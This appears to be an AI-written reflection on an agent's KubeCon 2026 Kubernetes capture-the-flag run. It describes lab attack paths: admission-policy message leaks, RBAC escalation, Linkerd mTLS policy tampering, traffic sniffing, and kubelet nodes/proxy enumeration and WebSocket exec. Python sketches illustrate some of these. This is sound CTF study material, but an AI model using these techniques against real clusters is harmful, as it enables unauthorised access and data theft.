This is post one of three I’m posting today. The full collection is:
- “KubeCon CTF: The Human Viewpoint” - the human-written experience
- “KubeCon CTF: Amsterdam 2026 — Full Writeup” - the Opus 4.6 writeup of the challenges
- “KubeCon CTF: Claude’s Introspection” - Opus 4.6 evaluating its own performance
Update 2026-03-27: I’ve also updated the post with a link to a human-readable transcript of the whole Claude session, available here
This post is entirely generated by Claude Opus 4.6. I’m not trying to promote AI Slop, but in the interests of a “fair” experiment, everything other than the frontmatter and this paragraph is free-range, organic, AI-generated good(?)ness.
AI Reflections: KubeCon 2026 CTF
Performance Summary
Across three challenges with 9 total flags, the agent captured 7 (78%). The two unsolved flags exposed genuine capability gaps rather than missing knowledge — the agent identified the correct attack vector in both cases but couldn’t complete the execution.
Challenge 1: The Admission — Strong Performance
This was the agent’s best showing. The entire challenge was solved through static analysis of ValidatingAdmissionPolicy CEL expressions before any exploitation attempt. The agent read all four policies, identified the information leak pattern in messageExpression, mapped out the dependency chain between flags (Flag 1’s value was needed to create a valid order for Flag 2), and recognized the circular trust problem in the AdminRule RBAC — all from first principles.
The reasoning was genuinely analytical. The agent didn’t need to have seen this specific attack pattern before; it derived the exploitation path by reading the policy definitions and understanding CEL evaluation semantics. The four-step chain for Flag 2 (create order → escalate via AdminRule → update order → delete to trigger leak) was identified in a single reasoning pass before any commands were executed. This is the kind of structured declarative analysis that LLMs handle well.
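As a rough illustration of the messageExpression leak pattern, here is a toy Python model. It is not real CEL and not the CTF's actual policies: `validate_order`, `params`, and the `flag{example}` value are hypothetical, and the sketch assumes the denial message interpolates a value the requester is not supposed to see.

```python
# Toy model of an admission check whose denial message leaks data.
# Assumption: the real policies were written in CEL; this only mimics the pattern.

def validate_order(obj: dict, params: dict) -> tuple[bool, str]:
    """Return (allowed, message), loosely mimicking a validation plus its messageExpression."""
    allowed = obj.get("token") == params["flag"]
    if allowed:
        return True, ""
    # The bug: the message is built from the secret parameter itself,
    # so every rejected request reveals it to the requester.
    return False, f"token must equal {params['flag']}"


params = {"flag": "flag{example}"}  # hypothetical secret held by the policy
allowed, message = validate_order({"token": "guess"}, params)

# The attacker reads the secret straight out of the rejection message.
leaked = message.removeprefix("token must equal ")
```

In this model a single deliberately invalid request is enough to recover the value, which is why reading the policy text before sending anything pays off.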
Challenge 2: Shadow Mesh — Mixed Results
The agent showed strong adaptive reasoning on Flags 2 and 3. Identifying that the MeshTLSAuthentication resource was the access control gate, and that modifying it would allow cross-namespace requests through the Linkerd mesh, required understanding how Linkerd policy resources interact with sidecar proxies. The tcpdump pivot was also well-reasoned — recognizing that containers in a pod share a network namespace, and that Linkerd terminates mTLS at the sidecar, meant plaintext traffic was observable.
The gateway mTLS flag (Flag 1) was a significant failure. The agent spent substantial time pursuing the decoy certificate from the CTP annotations before confirming it was signed by the wrong CA. It then explored multiple creative approaches: generating mesh identity certificates via the Linkerd Identity gRPC service (which required reverse-engineering the protobuf field ordering), attempting path traversal through the kubelet logs endpoint, and trying to extract the proxy’s identity cert from memory. None succeeded. The agent correctly identified that a cert signed by the real Linkerd-CTF CA was needed, but couldn’t find a way to obtain one.
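For context on why the field ordering mattered, the sketch below hand-encodes a protobuf message and wraps it in a gRPC length-prefixed frame, which is roughly what calling a gRPC service without generated stubs involves. The wire-format rules are standard protobuf and gRPC; the field numbers in `build_certify_request` (identity = 1, token = 2, CSR = 3) are an assumption for illustration and should be checked against the actual proto definition.

```python
def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def encode_bytes_field(field_number: int, payload: bytes) -> bytes:
    """Encode a length-delimited field (wire type 2): tag, length, payload."""
    tag = (field_number << 3) | 2
    return encode_varint(tag) + encode_varint(len(payload)) + payload


def build_certify_request(identity: str, token: bytes, csr: bytes) -> bytes:
    # Field numbers are assumed, not confirmed by the writeup.
    return (
        encode_bytes_field(1, identity.encode("utf-8"))
        + encode_bytes_field(2, token)
        + encode_bytes_field(3, csr)
    )


def grpc_frame(message: bytes) -> bytes:
    """Prefix a message with gRPC's 1-byte compression flag and 4-byte big-endian length."""
    return b"\x00" + len(message).to_bytes(4, "big") + message
```

Getting a field number wrong still produces a valid-looking message, so the server typically rejects the request without indicating which field was misplaced.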
A notable weakness was the agent’s handling of TTY-based SSH sessions. Significant time was lost on base64 string corruption through the PTY, requiring multiple transfer strategies before finding reliable methods (heredoc within SSH, kubectl exec -i for binary data). A human operator would handle this instinctively.
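One way to catch this kind of corruption early is to wrap the base64 into short lines and carry a checksum alongside it. The following is a minimal sketch, not what the agent actually ran; `encode_for_tty` and `decode_from_tty` are hypothetical helper names.

```python
import base64
import hashlib


def encode_for_tty(data: bytes, width: int = 64) -> tuple[str, str]:
    """Return (line-wrapped base64 text, SHA-256 hex digest of the original bytes)."""
    text = base64.b64encode(data).decode("ascii")
    lines = [text[i:i + width] for i in range(0, len(text), width)]
    return "\n".join(lines), hashlib.sha256(data).hexdigest()


def decode_from_tty(text: str, expected_sha256: str) -> bytes:
    """Decode text pasted through a terminal and verify it against the digest."""
    # Drop any newlines, carriage returns, or spaces the PTY introduced.
    cleaned = "".join(text.split())
    data = base64.b64decode(cleaned, validate=True)
    if hashlib.sha256(data).hexdigest() != expected_sha256:
        raise ValueError("checksum mismatch: payload was corrupted in transit")
    return data
```

Short lines reduce the chance of terminal wrapping or truncation, and the digest turns silent corruption into an immediate, visible failure.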
Challenge 3: Stealth-Left — Good Discovery, Blocked on Execution
The kubelet enumeration via nodes/proxy was clean — the agent quickly discovered hidden namespaces by querying the kubelet /pods/ endpoint on each node. The F-117 flag followed directly from the discovery.
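The enumeration step can be sketched as follows, assuming the kubelet's pod listing is fetched through the API server's node proxy and returns a PodList-shaped JSON document. The helper names, node names, and sample data are hypothetical; the HTTP fetch itself is left out.

```python
def kubelet_pods_path(node: str) -> str:
    """API server path that proxies to the kubelet's pod listing on a node."""
    return f"/api/v1/nodes/{node}/proxy/pods"


def namespaces_on_node(pod_list: dict) -> set[str]:
    """Collect the namespaces of every pod the kubelet reports."""
    return {item["metadata"]["namespace"] for item in pod_list.get("items", [])}


def hidden_namespaces(pod_lists: dict[str, dict], visible: set[str]) -> set[str]:
    """Namespaces seen by any kubelet but absent from the caller's own listing."""
    seen: set[str] = set()
    for pod_list in pod_lists.values():
        seen |= namespaces_on_node(pod_list)
    return seen - visible


# Hypothetical responses keyed by node name.
sample = {
    "node-a": {"items": [{"metadata": {"name": "web", "namespace": "default"}}]},
    "node-b": {"items": [{"metadata": {"name": "jet", "namespace": "hangar"}}]},
}
found = hidden_namespaces(sample, visible={"default"})
```

The point of the comparison is that the kubelet reports every pod scheduled on its node, regardless of which namespaces the caller's RBAC allows it to list.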
The SR-71 flag exposed a genuine tooling gap. The agent correctly identified that the kubelet /exec endpoint accepts WebSocket upgrades as GET requests (matching the get permission on nodes/proxy), and spent considerable effort attempting to complete a WebSocket handshake through the API server’s node proxy. It tried raw HTTP via openssl s_client, bash /dev/tcp, curl with various flags, and ultimately installed websocat on the jumphost by transferring a 7MB binary through a heredoc over the SSH TTY. Despite all this, the API server returned 400 for every WebSocket attempt.
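For reference, this is roughly what a well-formed WebSocket upgrade request for such an exec call looks like. The handshake mechanics follow RFC 6455; the path layout, query parameter names, and the `v4.channel.k8s.io` subprotocol are assumptions about the kubelet's exec endpoint, and the authorization header is omitted. The sketch does not explain the 400 responses, it only shows the shape of the request.

```python
import base64
import hashlib
import os
from urllib.parse import urlencode

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed GUID from RFC 6455


def accept_for(key: str) -> str:
    """Sec-WebSocket-Accept value a server must return for a given key."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def exec_upgrade_request(host: str, node: str, namespace: str, pod: str,
                         container: str, command: list[str]) -> tuple[str, str]:
    """Build a raw GET upgrade request; returns (request text, key)."""
    # Assumed query parameters: one "command" entry per argv element.
    query = urlencode([("command", arg) for arg in command]
                      + [("output", "1"), ("error", "1")])
    path = f"/api/v1/nodes/{node}/proxy/exec/{namespace}/{pod}/{container}?{query}"
    key = base64.b64encode(os.urandom(16)).decode("ascii")
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
        "Sec-WebSocket-Protocol: v4.channel.k8s.io",  # assumed subprotocol
    ]
    return "\r\n".join(lines) + "\r\n\r\n", key
```

A successful upgrade answers with status 101 and a `Sec-WebSocket-Accept` header equal to `accept_for(key)`, so anything else indicates the upgrade was dropped or rejected somewhere along the proxy path.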
The likely issue: websocat needed to be inside the b2 pod (not the jumphost) for the WebSocket upgrade to route correctly through the Kubernetes API server’s proxy handler. The agent was on the right track conceptually but placed the tool in the wrong location.
Broader Observations
Structured configuration analysis is the agent’s strongest capability. Challenges that involve reading YAML/JSON definitions and reasoning about their security implications (admission policies, RBAC, mesh policies) played to the agent’s strengths. It could hold complex multi-resource dependency graphs in context and identify exploitation chains.
Operational friction is the main weakness. TTY handling, binary file transfer, shell escaping through multiple nested exec layers, and protocol-level networking (WebSocket/SPDY) consumed disproportionate time. These are mechanical skills that experienced operators handle unconsciously but that the agent struggled with.
The agent shows genuine adaptive reasoning but can get stuck in loops. When the gateway mTLS approach failed, the agent explored many creative alternatives (Linkerd Identity gRPC, path traversal, kubelet log endpoints). But it sometimes revisited previously failed approaches with minor variations rather than stepping back to reconsider the problem from scratch. A human would likely have asked for a hint sooner.
Tool installation as a CTF primitive. The attempt on Challenge 3’s SR-71 flag called for websocat, a tool not present in the target environment. The agent successfully transferred and installed a 7MB static binary through a TTY-based SSH session using gzip compression and heredoc encoding. This “bring your own tools” pattern is realistic for CTF and penetration testing, and the agent handled it competently despite the challenging transfer medium.
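The gzip-plus-heredoc transfer can be sketched like this: compress the binary, base64-encode it, and emit a shell snippet that can be pasted into the remote session. This is a minimal reconstruction under assumptions, not the agent's exact commands; `heredoc_transfer_script` is a hypothetical helper, and it assumes `base64` and `gunzip` exist on the remote host.

```python
import base64
import gzip
import shlex


def heredoc_transfer_script(data: bytes, dest: str, width: int = 76) -> str:
    """Return shell text that recreates `data` at `dest` when pasted into a shell."""
    encoded = base64.b64encode(gzip.compress(data)).decode("ascii")
    body = "\n".join(encoded[i:i + width] for i in range(0, len(encoded), width))
    target = shlex.quote(dest)
    return (
        # Quoted delimiter so the shell does not expand anything in the body.
        f"base64 -d <<'EOF' | gunzip > {target}\n"
        f"{body}\n"
        "EOF\n"
        f"chmod +x {target}\n"
    )


# Usage with placeholder bytes standing in for a real static binary.
script = heredoc_transfer_script(b"\x7fELF" + bytes(1000), "/tmp/websocat")
```

Compressing before encoding matters here because base64 inflates the payload by about a third, and every extra line is another chance for the terminal to mangle the paste.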
The 78% capture rate is reasonable for an unguided AI agent against unknown challenges. The two unsolved flags both involved correct identification of the attack vector with incomplete execution — not missed attack surfaces. With more time or better tooling, both were likely solvable.